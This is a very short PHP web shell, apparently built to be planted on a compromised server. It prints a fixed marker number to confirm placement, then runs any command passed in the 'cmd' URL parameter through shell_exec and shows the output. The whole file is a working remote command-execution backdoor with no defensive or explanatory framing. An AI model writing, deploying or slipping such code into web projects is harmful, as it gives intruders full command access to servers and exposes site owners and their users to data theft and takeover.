<?php
// Simple PHP shell for verification and command execution
echo 957932;
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>